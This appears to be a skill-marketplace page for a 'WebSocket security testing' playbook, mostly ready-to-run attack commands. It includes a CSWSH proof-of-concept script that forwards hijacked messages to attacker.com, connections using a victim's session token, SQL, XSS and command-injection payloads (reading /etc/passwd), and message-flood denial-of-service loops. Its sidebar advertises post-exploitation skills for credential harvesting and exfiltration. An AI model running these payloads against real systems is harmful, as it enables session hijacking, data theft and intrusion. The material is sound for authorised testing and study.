菜单
WebSocket security testing — CSWSH, message injection, auth bypass, origin validation
用 Codex 或 Claude 帮你安装 复制这段 Prompt,粘贴到 Codex、Claude 或其他助手里,让它检查 Skill 页面并帮你完成安装。
基于 SOC 职业分类
eBPF-based post-exploitation for kernel-level credential harvesting, process hiding, and traffic interception on Linux
AWS post-exploitation for IAM privilege escalation, data exfiltration, persistence, and operational security via boto3
Azure/Entra ID post-exploitation for tenant compromise, Key Vault extraction, managed identity abuse, and token manipulation
CI/CD pipeline attacks for secret extraction, pipeline injection, and supply chain compromise via GitHub/Jenkins/GitLab
Kubernetes post-exploitation for container escape, secret extraction, RBAC abuse, and cluster persistence
macOS post-exploitation for credential harvesting, DTrace monitoring, TCC bypass, and stealth operations via native tools
| name | attack-websocket |
| description | WebSocket security testing — CSWSH, message injection, auth bypass, origin validation |
| category | web-application |
| version | 1.0 |
| author | cyberstrike-official |
| tags | ["websocket","web","cswsh","injection","attack"] |
| tech_stack | ["web"] |
| cwe_ids | ["CWE-1385","CWE-346"] |
| chains_with | ["attack-cors"] |
| prerequisites | [] |
| severity_boost | {"attack-cors":"WebSocket + CORS bypass = cross-origin data theft via WS"} |
Exploit WebSocket implementation flaws including cross-site WebSocket hijacking (CSWSH), message injection, and authentication bypass.
# Look for WebSocket upgrade
curl -s -D- https://TARGET/ -H "Upgrade: websocket" -H "Connection: Upgrade"
# Check common paths
for path in /ws /socket /websocket /api/ws /chat /live /realtime; do
curl -s -D- "https://TARGET$path" \
-H "Upgrade: websocket" \
-H "Connection: Upgrade" \
-H "Sec-WebSocket-Version: 13" \
-H "Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==" 2>/dev/null | head -1
done
Check if Origin header is validated:
# Connect with evil origin
websocat -H "Origin: https://evil.com" "wss://TARGET/ws"
# If connection succeeds with evil.com origin → CSWSH is possible
PoC HTML:
<script>
var ws = new WebSocket('wss://TARGET/ws');
ws.onmessage = function(e) {
fetch('https://attacker.com/log?data=' + btoa(e.data));
};
ws.onopen = function() {
ws.send(JSON.stringify({action: 'get_profile'}));
};
</script>
# Connect without auth token
websocat "wss://TARGET/ws"
# Test token reuse after logout
websocat -H "Cookie: session=EXPIRED_TOKEN" "wss://TARGET/ws"
# Connect with another user's token
websocat -H "Cookie: session=VICTIM_TOKEN" "wss://TARGET/ws"
# Test for SQL injection via WebSocket message
websocat "wss://TARGET/ws" <<< '{"action":"search","query":"test\" OR 1=1--"}'
# XSS via WebSocket message (if rendered in other clients)
websocat "wss://TARGET/ws" <<< '{"action":"chat","message":"<img src=x onerror=alert(1)>"}'
# Command injection
websocat "wss://TARGET/ws" <<< '{"action":"exec","cmd":"id; cat /etc/passwd"}'
# Rapid message sending
for i in $(seq 1 1000); do
echo '{"action":"ping"}'
done | websocat "wss://TARGET/ws"
# Large message
python3 -c "print('{\"data\":\"' + 'A'*1000000 + '\"}')" | websocat "wss://TARGET/ws"
| Finding | Severity |
|---|---|
| CSWSH — cross-site WebSocket hijacking | High (P2) |
| No authentication on WebSocket | High (P2) |
| SQL/command injection via WS message | Critical (P1) |
| Stored XSS via WS message | High (P2) |
| Session not invalidated after logout | Medium (P3) |
websocat (external) — WebSocket CLI client